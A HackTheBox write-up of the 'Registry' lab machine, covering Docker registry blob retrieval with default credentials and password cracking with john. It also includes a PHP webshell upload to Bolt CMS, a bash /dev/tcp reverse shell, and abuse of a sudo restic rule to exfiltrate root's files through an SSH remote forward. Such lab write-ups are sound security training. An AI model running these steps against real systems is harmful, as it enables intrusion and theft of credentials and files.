Htb Registry Writeup
HackTheBox Registry Writeup
Overview
Registry is one of my favourite machines to date. It required me to think about problems in a different way to overcome restrictions placed on the machine by the firewall. The machine starts with the enumeration and discovery of the docker registry which allows you to access docker images containing important files. You then proceed to a web page to upload a webshell which allows you to upgrade your existing shell to a more privileged user who is able to use the restic command to make a backup of any file on the system.
Information Gathering
We can start by running nmap in order to get an overview of the open ports and services running on those ports.
We get back the following result.
> nmap -sC -sV 10.10.10.159
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-10 03:21 EST
Nmap scan report for 10.10.10.159
Host is up (0.28s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
| 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after: 2029-05-03T21:14:35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.70 seconds
From the initial scan we aren’t presented with a lot of information however we can see a website on port 80/443 and ssh on port 22. In addition to this, we can see the commonName is docker.registry.htb. This information will be useful later when we try to gain access to a user.
The name of the box paired with the enumerated “docker.registry.htb” link allows us to assume that we may be exploiting docker registry at some stage to complete this box. A quick google search on this topic provides important information about what it is and potential vulnerabilities.
Docker is a platform used by developers for delivering software in packages called containers through the use of OS-level virtualisation.
A docker registry is a storage and distribution system for docker images. Images are stored in repositories which can be accessed to pull images locally for use. An important note regarding docker registry is that by default any user can pull images and use them.
Before beginning our attempt to get user we should also run dirbuster. Dirbuster is a tool used to enumerate websites through brute force and will discover any pages of interest.
Dir found: / - 200
Dir found: /install/ - 200
File found: /backup.php - 200
File found: /install/index.php - 200
Dir found: /bolt/ - 200
File found: /bolt/index.php - 200
Dir found: /bolt/files/ - 403
Dir found: /bolt/tests/ - 403
Dir found: /bolt/src/ - 403
Dir found: /bolt/app/ - 403
Dir found: /bolt/tests/scripts/ - 403
Dir found: /bolt/app/resources/ - 403
Dir found: /bolt/app/view/ - 403
Dir found: /bolt/theme/ - 403
File found: /bolt/app/web.php - 200
Dir found: /bolt/app/view/img/ - 403
Dir found: /bolt/vendor/ - 403
Dir found: /bolt/src/Security/ - 403
Dir found: /bolt/extensions/ - 403
Dir found: /bolt/app/view/css/ - 403
Dir found: /bolt/app/src/ - 403
Dir found: /bolt/app/database/ - 403
Dir found: /bolt/vendor/bin/ - 403
Dir found: /bolt/app/view/toolbar/ - 403
Dir found: /bolt/app/view/img/lib/ - 403
Dir found: /bolt/src/Events/ - 403
Dir found: /bolt/app/view/js/ - 403
Dir found: /bolt/app/cache/ - 403
Dir found: /bolt/app/cache/trans/ - 403
Dir found: /bolt/app/config/ - 403
Dir found: /bolt/app/src/lib/ - 403
Dir found: /bolt/app/cache/development/ - 403
Dir found: /bolt/app/src/js/ - 403
Dir found: /bolt/app/src/js/modules/ - 403
Dir found: /bolt/app/cache/development/data/ - 403
File found: /bolt/src/Library.php - 200
Dir found: /bolt/app/cache/development/data/08/ - 403
Dir found: /bolt/app/cache/development/data/06/ - 403
Dir found: /bolt/app/cache/development/data/15/ - 403
Dir found: /bolt/app/cache/development/data/18/ - 403
Dir found: /bolt/app/cache/development/data/21/ - 403
Dir found: /bolt/app/cache/development/data/19/ - 403
Dir found: /bolt/app/cache/development/data/28/ - 403
Dir found: /bolt/app/cache/development/data/31/ - 403
Dir found: /bolt/app/cache/development/data/de/ - 403
Dir found: /bolt/app/cache/development/data/39/ - 403
Dir found: /bolt/app/cache/development/data/50/ - 403
Dir found: /bolt/app/cache/development/data/55/ - 403
Dir found: /bolt/app/cache/development/data/53/ - 403
Dir found: /bolt/app/cache/development/data/64/ - 403
Dir found: /bolt/app/cache/development/data/66/ - 403
Dir found: /bolt/app/cache/development/data/58/ - 403
Dir found: /bolt/app/cache/development/data/72/ - 403
Dir found: /bolt/app/cache/development/data/68/ - 403
Dir found: /bolt/app/cache/development/data/91/ - 403
Dir found: /bolt/app/cache/development/data/82/ - 403
Dir found: /bolt/app/cache/development/data/74/ - 403
Dir found: /bolt/app/cache/development/data/88/ - 403
Dir found: /bolt/app/cache/development/data/00/ - 403
Dir found: /bolt/app/view/fonts/ - 403
Dir found: /bolt/app/cache/development/data/db/ - 403
Dir found: /bolt/app/config/extensions/ - 200
Dir found: /bolt/src/Storage/ - 403
Dir found: /bolt/app/cache/development/data/b1/ - 403
File found: /bolt/src/Users.php - 200
Dir found: /bolt/app/resources/translations/ - 403
Dir found: /bolt/app/src/js/widgets/ - 403
Dir found: /bolt/app/cache/development/data/f1/ - 403
Dir found: /bolt/app/resources/translations/fr/ - 403
Dir found: /bolt/app/cache/development/data/b2/ - 403
Dir found: /bolt/app/cache/development/data/bc/ - 403
Dir found: /bolt/app/resources/translations/it/ - 403
Dir found: /bolt/app/resources/translations/id/ - 403
Dir found: /bolt/app/cache/development/data/ee/ - 403
Dir found: /bolt/app/resources/translations/ru/ - 403
Dir found: /bolt/app/cache/development/data/c2/ - 403
Dir found: /bolt/app/cache/development/data/a2/ - 403
Dir found: /bolt/app/resources/translations/pt/ - 403
Dir found: /bolt/app/resources/translations/ja/ - 403
Dir found: /bolt/app/resources/translations/hu/ - 403
Dir found: /bolt/app/src/js/widgets/external/ - 403
Dir found: /bolt/app/cache/development/data/b3/ - 403
Dir found: /bolt/app/cache/development/data/ff/ - 403
Dir found: /bolt/app/resources/translations/fi/ - 403
Dir found: /bolt/app/cache/development/data/ba/ - 403
Dir found: /bolt/app/src/js/widgets/base/ - 403
Dir found: /bolt/app/resources/translations/el/ - 403
Dir found: /bolt/app/cache/development/data/eb/ - 403
Dir found: /bolt/src/Form/ - 403
Dir found: /bolt/app/view/js/locale/ - 403
Dir found: /bolt/app/cache/development/data/e4/ - 403
Dir found: /bolt/src/Security/Random/ - 403
Dir found: /bolt/app/resources/translations/nb/ - 403
Dir found: /bolt/src/Storage/Database/ - 403
Dir found: /bolt/app/src/js/widgets/panel/ - 403
Dir found: /bolt/app/cache/development/data/a7/ - 403
Dir found: /bolt/src/Translation/ - 403
Dir found: /bolt/app/cache/development/data/d5/ - 403
Dir found: /bolt/app/cache/development/data/5a/ - 403
Dir found: /bolt/app/cache/development/data/c7/ - 403
This scan resulted in a huge number of web pages however most have returned a 403 error. This error message means that the page exists and is active however we do not have the right permissions to view it. This will however be important for later on in the box when we gain user level access.
Getting the First User
A quick search of google for “docker registry exploits” reveals this website which guides the reader through the steps for pulling docker images onto their system.
Using the knowledge of the commonName found in the nmap scan we can start by adding docker.registry.htb 10.10.10.159 to our /etc/hosts file. The hosts file is used to translate hostnames into IP addresses and is necessary for this box.
Following the guide we start by going to the docker.registry.htb/v2/ URL and are brought to a login page.
We haven’t found any credentials during enumeration, so we start by testing some default credentials that might work. Eventually the username “admin” and password “admin” is successful.
Following the guide further we can navigate to the next URL which is docker.registry.htb/v2/_catalog.
Here we are presented with the word “bolt-image”.
As stated in the guide, we now need to go to docker.registry.htb/v2/bolt-image/tags/list# which presents us with the “latest” tag which we can use to navigate to the final URL which allows us to download the “latest” file. docker.registry.htb/v2/bolt-image/manifests/latest
At the top of this file we are given a series of lines which are titled “blobSum” and each have a sha256 string associated with them.
{
"blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
},
{
"blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"
},
{
"blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"
},
{
"blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"
},
{
"blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0"
},
{
"blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a"
},
{
"blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797"
},
{
"blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"
}
Navigate to each of the URLs stated in the guide using these sha256 strings replacing the final part for each line.
docker.registry.htb/v2/bolt-image/blobs/sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
Download each file that you are prompted to download and open them to be searched through.
There are many files, so I cannot include them all here, but in one of the files you will find an id_rsa private key.
> john id_rsa
GkOcz221Ftb3ugog
Cracking this reveals a password however we still don’t know what user to use this key on.
Going back to the information gathered from dirbuster we know of the bolt directory. We can assume that bolt might be a user on the system.
We can then ssh into the bolt user with the following command.
> ssh -i id_rsa bolt@10.10.10.159
Now submit the user.txt file.
Further Enumeration
Once inside the system we need to begin our enumeration for how to proceed. Based on our prior enumeration we know that many files exist within the bolt directory, so we will start our enumeration there.
Navigating to var/www/html reveals a file titled “backup.php”. This file has a line that references the URL “backup.registry.htb/bolt/bolt”.
To access this we need to go back to our hosts file in the etc folder and change “docker.registry.htb” to “backup.registry.htb”.
When we go to this site we are brought to a login page. Default credentials and user credentials don’t work here so we need to enumerate some more to find what we need.
Within the html directory there is a folder named bolt. Opening this reveals multiple new folders one of which is titled “database”. Looking within the database folder reveals a bolt.db file. The encrypted credentials for this webpage are stored within the folder. Searching through this file gives us a line that says
admin$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK
We can assume that this is the username for the login and the encrypted password.
This is easily verifiable using john to crack the password which reveals the password “strawberry”.
> john hash.txt
strawberry
We can now use the username “admin” and password “strawberry” to log into that website.
Getting the Second User
The next stage in this box is to gain access to another user with greater privileges. On this website we can see 2 areas of interest.
The first is the file management tab which allows for the uploading of files.
The second is the config file which determines what types of files can be uploaded.
Luckily, we have access to edit this config file allowing us to upload any file we wish.
Before we edit this to allow a file type and upload it we need to first locate what it is we want to upload. We need to try to gain access to some kind of shell which will let us execute commands as the new user.
A google search for webshells leads us to a php exploit file named “whitewinterwolf php webshell”.
In the config file pictured above add “php,” into the file then proceed to the file upload button to upload the webshell. You can then navigate to the webshell.php page.
Now that we have a webshell allowing us to execute commands we need to get a more permanent solution by spawning a reverse shell. I attempted to listen for a shell from my local computer and send it from the webshell however the firewall was blocking it so instead I had to upgrade my existing shell as the user Bolt.
On bolt, I setup a listener with the following command.
nc -lvnp 1234
I then sent the reverse shell using a bash command that can be found when searching reverse shell cheatsheet.
/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'
The reason for using 127.0.0.1 here is because we are upgrading an internal user rather than sending it to our own ip like we usually would.
We have now gained a shell as the user www-data.
Getting Root
When first getting into a new shell its always good to run sudo -l to identify if you are able to run any commands as sudo. In this case it is the restic command outputted by this that will be our path to root.
>sudo -l
/usr/bin/restic backup -r rest*
Restic is an application that allows you to backup files to a location which can then be accessed at a later time. As we have access to run restic as root we can access any file on the system including the root.txt file. As you have access to this you could access any file on the system however for the purposes of HackTheBox we only need the .txt file.
The process for this involves creating a repository on our local system to backup the file to and opening a rest server so that when we execute the command as www-data it can see the repository to backup the file to. We also need to create an ssh port forward in order to transfer the information without being blocked by the firewall.
We start by creating the restic repository with the command. When it asks for a password just set it as 123.
> sudo restic init --repo /tmp/restic
We then open the server so that www-data can backup to it.
> rest-server --no-auth --listen 0.0.0.0:8001
Now to create the port forward we need to add the -R flag to our ssh command where we log into the system as the user bolt. the -R flag stands for Remote Forwarding.
> ssh -R 8001:10.10.16.82:8001 -i id_rsa bolt@10.10.10.159
Now that we have the restic repository, server and ssh port forward in place we only need to perform the actual backup on the www-data user.
> echo 123 >/tmp/r
> sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8001/ -p r /root/root.txt
We echo 123 into the r file as this is the password used for the repository we are backing up to.
You can now go onto your local system and you should see the snapshot when you use the following command which you can then use to restore.
restic -r /tmp/restic snapshots
restic -r /tmp/restic restore 26c695b7 --target .
You can now read root.txt